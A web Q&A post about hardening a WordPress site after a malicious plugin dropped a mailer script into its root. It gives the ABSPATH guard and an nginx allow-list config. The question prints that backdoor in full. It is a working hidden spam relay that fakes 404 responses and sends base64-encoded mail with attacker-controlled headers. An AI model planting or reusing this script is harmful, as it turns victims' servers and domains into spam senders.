WordPress disable direct access of files in WordPress installation path

I want to add a security feature to my WordPress website to stop direct access to files added to the root of the WordPress installation. Recently I discovered that a malicious plugin added some files to send email. Below is the malicious PHP code that was added.

<?php
// Mailer script dropped by the malicious plugin, as posted. Two characters the
// page had lost are restored so it parses: the opening "<?php" tag and the
// "=>" in the foreach. The behaviour is otherwise unchanged.

$method = $_SERVER['REQUEST_METHOD'];

switch ($method) {
  case 'GET':
    // A plain visit returns a fake 404 so casual visitors and scanners see nothing.
    echo '###ERROR 404';
    exit;
  case 'POST':
    // Every POST value is a base64 blob of pipe-separated mail fields.
    foreach ($_POST as $key => $x_value) {
      $data    = base64_decode($x_value);
      $to_data = explode('|', $data);

      $to         = $to_data[0];
      $x_subject  = $to_data[1];
      $x_body     = $to_data[2];
      $from_user  = $to_data[3];   // parsed but never used
      $from_email = $to_data[4];   // parsed but never used
      $header     = $to_data[5];   // attacker-controlled raw headers (From:, etc.)

      // Sends through the server's MTA. The status words are deliberately
      // misleading: "403" on success, "404" on failure.
      $jfnbrsjfq = mail($to, $x_subject, $x_body, $header);
      if ($jfnbrsjfq) { echo 'error 403'; } else { echo 'error 404 : ' . $jfnbrsjfq; }
    }
    break;
}

In this case the hacker would pass some parameters to this code to send emails using my domain.

I thought there might be a way to disable direct access to these files for sending email or any other malicious activity. Is there a way to restrict this using nginx? What is the best approach to deal with this case? I will appreciate any useful input.

Look into adding a constant check at the top of the script:

if ( ! defined( 'ABSPATH' ) ) {
    exit; // Exit if accessed directly
}

See: https://stackoverflow.com/questions/43212340/what-is-meant-by-if-defined-abspath
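A web-server-level complement to the ABSPATH guard, as an added example that is not part of the question or the answer above. The guard only protects files that contain it; a script dropped into the root by a compromised plugin will not carry it, so the check that actually stops the mailer is one the web server enforces. The configuration below makes nginx hand only a fixed allow-list of WordPress entry points to PHP-FPM and return 404 for every other `.php` URL, which is what the question asks for. It assumes a single-site WordPress under `/var/www/html`, PHP-FPM on `/run/php/php-fpm.sock`, and the host name `example.com`; all three are placeholders to replace.

```nginx
# Added example, not from the original question or answer. Assumes a standard
# single-site WordPress layout under /var/www/html and PHP-FPM listening on
# /run/php/php-fpm.sock; the paths and server_name are placeholders.

server {
    listen 80;
    server_name example.com;
    root /var/www/html;
    index index.php;

    # Pretty permalinks: anything that is not a real file or directory is
    # routed through index.php.
    location / {
        try_files $uri $uri/ /index.php?$args;
    }

    # Regex locations are tested in the order written and the first match
    # wins, so the allow rules must come before the catch-all deny at the end.

    # 1. Root-level entry points shipped by WordPress core. A file dropped
    #    into the root under any other name (such as the mailer script in the
    #    question) never matches here and falls through to the deny rule.
    location ~ ^/(index|wp-login|wp-cron|wp-comments-post|wp-signup|wp-activate|wp-trackback|wp-links-opml|wp-mail|xmlrpc)\.php$ {
        try_files $uri =404;   # refuse path-info tricks such as /index.php/anything
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass unix:/run/php/php-fpm.sock;
    }

    # 2. Dashboard scripts under wp-admin/, which browsers request directly.
    location ~ ^/wp-admin/.*\.php$ {
        try_files $uri =404;
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass unix:/run/php/php-fpm.sock;
    }

    # 3. The one wp-includes script that older WordPress releases load
    #    directly. An exact-match location takes priority over the regexes.
    location = /wp-includes/js/tinymce/wp-tinymce.php {
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass unix:/run/php/php-fpm.sock;
    }

    # 4. Every other .php URL: neither executed nor served. This covers
    #    wp-content/uploads, plugin and theme directories, the rest of
    #    wp-includes, and any new file in the root. 404 rather than 403 so a
    #    probe learns nothing about what exists on disk.
    location ~ \.php$ {
        return 404;
    }
}
```

Validate with `nginx -t`, reload, then confirm that a harmless test file such as `/zz-test.php` placed in the root returns 404 while `/wp-login.php` still returns 200. Drop `xmlrpc` from the list if you do not use XML-RPC, and give any plugin that genuinely needs its own direct entry point an explicit `location =` block rather than loosening the catch-all. Two caveats: this only blocks direct HTTP requests, so the rogue plugin can still call `mail()` from inside normal WordPress hooks until it is removed, and the dropped file itself should still be deleted and the plugin that wrote it identified and uninstalled.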
